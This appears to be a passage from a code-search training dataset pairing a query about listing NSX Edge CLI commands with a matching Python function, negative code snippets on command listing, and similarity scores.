\"\\n\".join(self.commands.keys())\n return result, True", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def get_commands(self):\n\t\treturn list(self.command_handlers.keys())", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def get_commands(self):\r\n return self._commands", "def list_command(ctx: Any) -> None:\n pass", "def get_all_commands():\n\n session_attributes = {}\n card_title = \"All Commands\"\n speech_output = \"You can ask for a synonym, antonym, rhyme, definition, part of speech, syllables, or frequency of a word by saying something like 'synonym for happy'. You can also ask for a random synonym, antonym, definition, or rhyme by saying something like 'random synonym for happy'. If you want all of them, say something like 'all synonyms for happy.'\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Ask for a synonym, antonym, part of speech, rhyme, definition, syllables, or frequency of a word! Or say 'all commands' to get hear all commands.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(card_title, speech_output, reprompt_text, should_end_session))", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def set_command_list(self):\n self.commands = dict( \\\n BTN_POWER_OFF = 2, \\\n BTN_TV = 27, \\\n BTN_1 = 4, \\\n BTN_2 = 5, \\\n BTN_3 = 6, \\\n BTN_4 = 8, \\\n BTN_5 = 9, \\\n BTN_6 = 10, \\\n BTN_7 = 12, \\\n BTN_8 = 13, \\\n BTN_9 = 14, \\\n BTN_0 = 17, \\\n BTN_FAVOURITE_CHANNEL = 68, \\\n BTN_PREVIOUS_CHANNEL = 19, \\\n BTN_VOLUME_UP = 7, \\\n BTN_VOLUME_DOWN = 11, \\\n BTN_CHANNEL_UP = 18, \\\n BTN_CHANNEL_DOWN = 16, \\\n BTN_MUTE = 15, \\\n BTN_SOURCE = 1, \\\n BTN_INFO = 31, \\\n BTN_TOOLS = 75, \\\n BTN_GUIDE = 79, \\\n BTN_RETURN = 88, \\\n BTN_MENU = 26, \\\n BTN_ENTER = 104, \\\n BTN_UP = 96, \\\n BTN_DOWN = 97, \\\n BTN_LEFT = 101, \\\n BTN_RIGHT = 98, \\\n BTN_INTERNET = 147, \\\n BTN_EXIT = 45, \\\n BTN_RED = 108, \\\n BTN_GREEN = 20, \\\n BTN_YELLOW = 21, \\\n BTN_BLUE = 22, \\\n BTN_TELETEXT = 44, \\\n BTN_MEDIA = 140, \\\n BTN_CONTENT = 121, \\\n BTN_CHANNEL_LIST = 107, \\\n BTN_AD = 0, \\\n BTN_SUBTITLE = 37, \\\n BTN_FORWARD = 69, \\\n BTN_PAUSE = 74, \\\n BTN_BACKWARD = 72, \\\n BTN_RECORD = 73, \\\n BTN_PLAY = 71, \\\n BTN_STOP = 70, \\\n BTN_SLEEP = 3, \\\n BTN_PICTURE_IN_PICTURE = 32, \\\n BTN_PSIZE = 62, \\\n BTN_ENERGY = 119, \\\n BTN_SRS = 110, \\\n BTN_PMODE = 40, \\\n BTN_P_DYNAMIC = 189, \\\n BTN_P_STANDARD = 223, \\\n BTN_P_MOVIE1 = 222, \\\n BTN_P_MOVIE2 = 221, \\\n BTN_P_USER1 = 220, \\\n BTN_P_USER2 = 219, \\\n BTN_P_USER3 = 218, \\\n BTN_ASPECT_43 = 227, \\\n BTN_ASPECT_169 = 228, \\\n BTN_S_SCART1 = 132, \\\n BTN_S_SCART2 = 235, \\\n BTN_S_MODULE = 134, \\\n BTN_S_AV = 236, \\\n BTN_S_VGA = 105, \\\n BTN_S_HDMI1 = 233, \\\n BTN_S_HDMI2 = 190, \\\n BTN_S_HDMI3_DVI = 194, \\\n BTN_S_HDMI4 = 197)", "def getCommands(self):\r\n return [z for x, y, z in self._log if x == 'command']", "def list_commands(self, ctx: Context) -> List[str]:\n return self.docs_command.all_commands", "def get_commands(self):\n return self._commands", "def terminal_commands(self):\n return OrderedDict([\n ('query_commands', (['hi', 'how', 'hello'], self._query_commands)),\n ('control_stop', (['stop'], self._control_stop)),\n ('control_pause', (['pause'], self._control_pause)),\n ('control_play', (['start', 'play'], self._control_play)),\n ('query_info', (['who', 'what'], self._query_info)),\n ('control_forward', (['skip', 'next'], self._control_skip)),\n\n ])", "def get_admin_commands(self):\n\n return []", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"" ]
[ "0.6511725", "0.63629586", "0.62398857", "0.61768675", "0.6060961", "0.60467505", "0.60360336", "0.6015906", "0.60068876", "0.59958434", "0.59946626", "0.59913915", "0.597592", "0.5959561", "0.5952795", "0.5924984", "0.58672166", "0.5802978", "0.57971066", "0.5770296", "0.5765358", "0.5748881", "0.57127273", "0.5712307", "0.5711467", "0.56788874", "0.5673432", "0.5655188", "0.5644647", "0.5644096" ]
0.7366051
0
Logs in to given NSX edge in enable mode with specified credentials and fetches the list of all supported commands. Returns the list of commands in a pyset object. Refer /VDNetLib/TestData/Edge/list_command_enable_mode for output format
def get_all_supported_commands_enable_mode( cls, client_object, **kwargs): pydict = dict() try: if "password" in kwargs: password = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % password) # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_enable_terminal("list", ['#'], password=password) else: # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_enable_terminal("list", ['#']) except: # Close the expect connection object client_object.connection.close() pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() # Fetching the Error string if any error_occured = command_output.find('Error') if expect_condition == 0: # expecting the '#' prompt if error_occured == -1: pylogger.info("Successfully listing enable mode commands") lines = command_output.strip().split("\n") lines = [i.strip() for i in lines] if "NSXEdge" in lines: lines.remove("NSXEdge") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list enable mode commands") else: pydict['result'] = False return pydict
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_all_supported_commands_configure_mode(cls, client_object,\n **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n pwd = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % pwd)\n else:\n pwd = constants.VSMterms.PASSWORD\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_configure_terminal(\"list\", ['#'],\n enable_password=pwd)\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing configure mode commands\")\n lines = command_output.split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge(config)\" in lines:\n lines.remove(\"NSXEdge(config)\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list config mode commands\")\n else:\n raise RuntimeError(\"Unable to establish expect connection\")", "def get_all_supported_commands_admin_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n EXPECT_PROMPT = ['bytes*', 'NSXEdge>']\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n client_object.password = password\n\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n else:\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n except:\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing admin mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list admin mode commands\")", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def getCommands(self):", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def list_commands(self, ctx):\n commands = self._iter_commands()\n return commands.keys()", "def get_commands(self):\n return list(self.commands.values())", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def list_command(ctx: Any) -> None:\n pass", "def getCommandList(self):\n return self.commands.keys()", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def do_list_commands(self):\n result = \"\\n\".join(self.commands.keys())\n return result, True", "def get_admin_commands(self):\n\n return []", "def commands(self) -> List[Command]:\n return []", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def get_commands(self):\n\t\treturn list(self.command_handlers.keys())", "def list_commands(self, ctx):\n commands = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n commands.append(filename[4:-3])\n commands.sort()\n return commands", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'", "def get_commands(self):\r\n return self._commands", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def _get_supported_commands(self):\n logger.info(\"Default unconfigured API, not adding any commands!\")\n pass", "def setup_commands(self):\n return self.get_data(\"setup_commands\")", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "async def listcommands(self, ctx):\n\t\twith open('custom_commands.json', 'r') as f:\n\t\t\tcommands = json.load(f)\n\t\t\toutput = \", \".join([*commands])\n\t\t\tawait ctx.send(f\"```List of custom commands:\\n{output}```\")", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def get_commands(self):\n return self._commands", "def getCommands(self):\r\n return [z for x, y, z in self._log if x == 'command']" ]
[ "0.6705702", "0.66978204", "0.5725764", "0.5724217", "0.569081", "0.5650631", "0.56415504", "0.5569029", "0.556437", "0.55634505", "0.55406326", "0.5539092", "0.54985934", "0.5491004", "0.5447574", "0.54346836", "0.54318064", "0.54090124", "0.54086053", "0.5407843", "0.540509", "0.5399598", "0.53862506", "0.538494", "0.53437984", "0.5333684", "0.5327338", "0.53220916", "0.5266587", "0.5249537" ]
0.7370529
0
Logs in to given NSX edge in admin mode with specified credentials and fetches the list of all supported commands. Returns the list of commands in a pyset object. Refer /VDNetLib/TestData/Edge/list_command_admin_mode for output format
def get_all_supported_commands_admin_mode( cls, client_object, **kwargs): pydict = dict() EXPECT_PROMPT = ['bytes*', 'NSXEdge>'] try: if "password" in kwargs: password = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % password) client_object.password = password # Execute the command on the Edge VM command_output = client_object.connection.\ request("list", EXPECT_PROMPT).response_data else: # Execute the command on the Edge VM command_output = client_object.connection.\ request("list", EXPECT_PROMPT).response_data except: pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() # Fetching the Error string if any error_occured = command_output.find('Error') if error_occured == -1: pylogger.info("Successfully listing admin mode commands") lines = command_output.strip().split("\n") lines = [i.strip() for i in lines] if "NSXEdge" in lines: lines.remove("NSXEdge") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list admin mode commands")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_admin_commands(self):\n\n return []", "def get_all_supported_commands_enable_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'],\n password=password)\n\n else:\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'])\n\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing enable mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list enable mode commands\")\n else:\n pydict['result'] = False\n return pydict", "def get_all_supported_commands_configure_mode(cls, client_object,\n **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n pwd = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % pwd)\n else:\n pwd = constants.VSMterms.PASSWORD\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_configure_terminal(\"list\", ['#'],\n enable_password=pwd)\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing configure mode commands\")\n lines = command_output.split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge(config)\" in lines:\n lines.remove(\"NSXEdge(config)\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list config mode commands\")\n else:\n raise RuntimeError(\"Unable to establish expect connection\")", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_command(ctx: Any) -> None:\n pass", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def getCommands(self):", "async def _c_list(self, ctx):\n command_list = self.database.get_guild_commands(ctx.guild.id)\n if len(command_list) == 0:\n await ctx.send(\"This server has no custom commands\")\n return\n out = \"```\\nServer Commands:\\n\"\n for command in command_list:\n out += f\"{command.name}: {command.text}\\n\"\n out += \"```\"\n await ctx.send(out)", "def get_commands(self):\n return list(self.commands.values())", "def list_commands(self, ctx):\n commands = self._iter_commands()\n return commands.keys()", "def get_commands(self):\r\n return self._commands", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def list_commands(self, ctx: Context) -> List[str]:\n return self.docs_command.all_commands", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def getCommandList(self):\n return self.commands.keys()", "def commands(self) -> List[Command]:\n return []", "async def listcommands(self, ctx):\n\t\twith open('custom_commands.json', 'r') as f:\n\t\t\tcommands = json.load(f)\n\t\t\toutput = \", \".join([*commands])\n\t\t\tawait ctx.send(f\"```List of custom commands:\\n{output}```\")", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def list_commands():\n print(' ')\n print('Chat Client Commands')\n print('-----------------------')\n print(\"Whisper: Send a online user a private message: /w username (message)\")\n print('Current Users: Get a list of all current online users: /users')\n print('File Transfer (Upload): Transfer a file to the server: /file (file path)')\n print('File Transfer (Download): Prints out the contents of a file: /file_download (file name)')\n print('File List: Lists all files currently stored on a server: /file_list')\n print('Save Username: Save your current username to the server to auto login at this ip address: /save')\n print('Exit: Close the client: quit or exit')\n print('Commands: Lists all commands for the Client: /help')\n print('Feed: Redisplay all messages: /feed')\n print('-----------------------')\n print(' ')", "def get_commands(self):\n return self._commands", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'", "async def _list_commands(self):\n message_cmds = \"regular commands:\\n\"\n tts_cmds = \"tts commands:\\n\"\n cur = self.conn.cursor()\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is true;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n tts_cmds += invoke[0] + ', '\n tts_cmds = tts_cmds[0:-2]\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is false;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n message_cmds += invoke[0] + ', '\n message_cmds = message_cmds[0:-2]\n cur.close()\n await self.bot.say(message_cmds)\n await self.bot.say(tts_cmds)", "def list_commands(self, ctx):\n commands = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n commands.append(filename[4:-3])\n commands.sort()\n return commands", "def get_alt_commands(self):\n return self.altcmds" ]
[ "0.6680752", "0.65000904", "0.64158475", "0.6281375", "0.6140795", "0.60326713", "0.5936857", "0.5907522", "0.58782774", "0.5867255", "0.58409363", "0.5823446", "0.581068", "0.5809843", "0.5808537", "0.5794938", "0.57770985", "0.5762379", "0.5757621", "0.57531905", "0.5749414", "0.57170707", "0.5714029", "0.5703542", "0.57002604", "0.56734246", "0.5665173", "0.56605387", "0.56561804", "0.56550336" ]
0.74650776
0
Creates or removes feed mappings. Operation statuses are returned.
def MutateFeedMappings(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_mapping(self):\n\n indice = client.IndicesClient(self.es)\n\n indice.put_mapping(index=self.es_main_index,\n doc_type=self.es_main_type,\n body=self.mapping)", "def bulk_update_mappings(\n self, mapper: Mapper[Any], mappings: Iterable[Dict[str, Any]]\n ) -> None:\n self._bulk_save_mappings(\n mapper, mappings, True, False, False, False, False\n )", "def make_mapping(self) -> None:\n start_mark = StreamMark('generated node', 0, 0, 0)\n end_mark = StreamMark('generated node', 0, 0, 0)\n self.yaml_node = yaml.MappingNode('tag:yaml.org,2002:map', list(),\n start_mark, end_mark)", "def post(self, request, *args, **kwargs):\n category_mapping_payload = request.data\n\n assert_valid(category_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n category_mapping_object = mapping_utils.create_or_update_category_mapping(category_mapping_payload)\n\n return Response(\n data=self.serializer_class(category_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def _update_index_mappings(conn, name, doc_type, mapping):\n try:\n conn.indices.put_mapping(index=name, doc_type=doc_type, body=mapping)\n except elasticsearch.exceptions.RequestError as err:\n if not err.error.startswith(\"MergeMappingException\"):\n raise\n\n message = (\n \"Elasticsearch index mapping cannot be automatically \"\n \"updated! Please reindex it. You may find the `hypothesis \"\n \"search reindex` command helpful.\"\n )\n log.critical(message)\n raise RuntimeError(message) from err", "def bulk_insert_mappings(\n self,\n mapper: Mapper[Any],\n mappings: Iterable[Dict[str, Any]],\n return_defaults: bool = False,\n render_nulls: bool = False,\n ) -> None:\n self._bulk_save_mappings(\n mapper,\n mappings,\n False,\n False,\n return_defaults,\n False,\n render_nulls,\n )", "def GetFeedMapping(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def GetFeedMapping(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def update(self, mappings):\n self._mappings.update(mappings)\n return self", "def test_update_discovery_map__no_change(self) -> None:\n expected = {\n 'schema-version': 'v1',\n 'document-version': 'z',\n 'namespaces': [],\n }\n with open(self._old_file, 'w') as f:\n json.dump(expected, f)\n self._config.discovery_map_exec = self._get_runnable_cmd(0, None, expected)\n # data-store should not run, so have it generate an error if it does.\n self._config.data_store_exec = self._get_runnable_cmd(1, None, {})\n gen = generate.GenerateDataImpl(self._config)\n res = gen.update_discovery_map()\n self.assertEqual(0, res)", "def test_model_can_create_a_URLMapping(self):\n old_count = URLMapping.objects.count()\n self.url_mapping.save()\n new_count = URLMapping.objects.count()\n self.assertNotEqual(old_count, new_count)", "def remove_atom_mapping(self, exceptions: Sequence[int] = None) -> None:\n exceptions = exceptions or []\n for atom in self.rd_mol.GetAtoms():\n if exceptions and atom.GetAtomMapNum() in exceptions:\n continue\n atom.SetAtomMapNum(0)\n self.smiles = Chem.MolToSmiles(self.rd_mol)\n self._clear_cache()", "def reset_mapping(self):\n log.debug('Resetting %s wiremock mapping', self.url)\n try:\n requests.post(self.mapping_reset_url).raise_for_status()\n except:\n log.exception('Failed resetting %s wiremock mapping', self.url)\n raise WiremockError('Failed resetting %s wiremock mapping' % self.url)", "def test_write(self):\n map_to_write = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_write_map.map')\n written_maps = glob.glob(map_to_write)\n self.assertEqual(len(written_maps), 0)\n with open(map_to_write, 'w') as f:\n map_ = mapreader.get_data(self.map_file)\n map_.write(f)\n written_maps = glob.glob(map_to_write)\n self.assertEqual(len(written_maps), 1)\n map(os.remove, written_maps)", "def drop_mappings(self):\n if config.HAS_RBAC:\n RBACMapping.objects(org=self._instance.id, team=self.id).delete()", "def test_store_mapping(self):\r\n\r\n expected = [\"1:\\t0\\t2\\t5\\t6\\n\",\r\n \"3:\\n\",\r\n \"4:\\n\",\r\n \"8:\\t7\\n\"]\r\n\r\n self.files_to_remove.append(\"/tmp/test_store_mapping_mapping.txt\")\r\n store_mapping(self.mapping, \"/tmp/\", prefix=\"test_store_mapping\")\r\n observed = list(open(\"/tmp/test_store_mapping_mapping.txt\", \"U\"))\r\n self.assertItemsEqual(observed, expected)", "def applyMapping(self):\n pass", "def post(self, request, *args, **kwargs):\n employee_mapping_payload = request.data\n\n assert_valid(employee_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n employee_mapping_object = mapping_utils.create_or_update_employee_mapping(employee_mapping_payload)\n\n return Response(\n data=self.serializer_class(employee_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def create_namespaced_image_stream_mapping(self, body, namespace, **kwargs):\n\n all_params = ['body', 'namespace', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_namespaced_image_stream_mapping\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_namespaced_image_stream_mapping`\")\n # verify the required parameter 'namespace' is set\n if ('namespace' not in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `create_namespaced_image_stream_mapping`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/imagestreammappings'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ImageStreamMapping',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def _fill_maps(maps, map_counts, paths, pixels, mapper, ctx):\n xy_ind = 0\n with RestructuredTODStore(paths) as store:\n for i, tod_pixel in enumerate(pixels):\n re_data = store.get(tod_pixel)\n values, counts = mapper.get_mapped_values(re_data, ctx)\n maps[:, xy_ind, i] = values\n map_counts[:, xy_ind, i] = counts", "def storeFeeds(self, url, feeds):\n for feed in feeds:\n _date = time.localtime()\n if 'published_parsed' in feed:\n _date = feed['published_parsed']\n date = datetime(_date.tm_year, _date.tm_mon, _date.tm_mday)\n doc = {\n '_id': md5_new(feed.id).hexdigest(),\n 'title': feed.title,\n 'date': date,\n 'link': feed.link,\n 'summary': feed.summary,\n 'type': url,\n 'status': 'new',\n }\n try:\n self.feedsCol.insert(doc)\n except DuplicateKeyError:\n pass", "def post(self, request, *args, **kwargs):\n project_mapping_payload = request.data\n\n assert_valid(project_mapping_payload is not None, 'Request body is empty')\n\n mapping_utils = MappingUtils(kwargs['workspace_id'])\n project_mapping_object = mapping_utils.create_or_update_project_mapping(project_mapping_payload)\n\n return Response(\n data=self.serializer_class(project_mapping_object).data,\n status=status.HTTP_200_OK\n )", "def _do_mapping(self):\n pass", "def post(self):\n check_content_type('application/json')\n map_object = Map()\n app.logger.info('Payload = %s', api.payload)\n map_object.deserialize(api.payload)\n map_object.save()\n app.logger.info('Map with new key [%s] saved!', map_object.key)\n return map_object.serialize(), status.HTTP_201_CREATED", "def test_update_discovery_map__failure_gen(self) -> None:\n self._config.discovery_map_exec = self._get_runnable_cmd(6, None, {})\n self._config.data_store_exec = self._get_runnable_cmd(12, None, {})\n gen = generate.GenerateDataImpl(self._config)\n res = gen.update_discovery_map()\n self.assertEqual(1, res)", "def at_idmapper_flush(self):\n return True", "def push(self, mapping):\n self.mappings.append(mapping)", "def test_commit_discovery_map__success(self) -> None:\n self.assertFalse(os.path.isfile(self._old_file))\n expected = {\n 'schema-version': 'v1',\n 'document-version': 'a',\n 'namespaces': [],\n }\n self._config.data_store_exec = self._get_runnable_cmd(0, self._gen_file, expected)\n gen = generate.GenerateDataImpl(self._config)\n res = gen.commit_discovery_map()\n self.assertEqual(0, res)\n self.assertTrue(os.path.isfile(self._old_file))\n with open(self._old_file, 'r') as f:\n self.assertEqual(expected, json.load(f))", "def create_image_stream_mapping(self, body, **kwargs):\n\n all_params = ['body', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_image_stream_mapping\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_image_stream_mapping`\")\n\n resource_path = '/oapi/v1/imagestreammappings'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ImageStreamMapping',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def update(self):\n feed = feedparser.parse(self._schema % self.project)\n added = []\n for entry in feed['entries']:\n if entry['id'] not in self.entries:\n self.entries[entry['id']] = entry\n added.append(entry)\n return added" ]
[ "0.53210986", "0.5282509", "0.5193511", "0.51220226", "0.5118502", "0.5118434", "0.5047823", "0.5047823", "0.50096697", "0.5001195", "0.4983614", "0.49467513", "0.49398443", "0.49174434", "0.49069437", "0.48667857", "0.48645493", "0.48289153", "0.47788695", "0.4766776", "0.476327", "0.47366348", "0.47332823", "0.47295624", "0.47229648", "0.47102362", "0.47100705", "0.4690564", "0.46588916", "0.46532372" ]
0.59377956
1
Fork off a background thread for execution. When this method returns, it will be on the new process. This will also populate the PID file with the new process id. This uses the UNIX doublefork magic, see Stevens' "Advanced Programming in the UNIX Environment" for details (ISBN 0201563177)
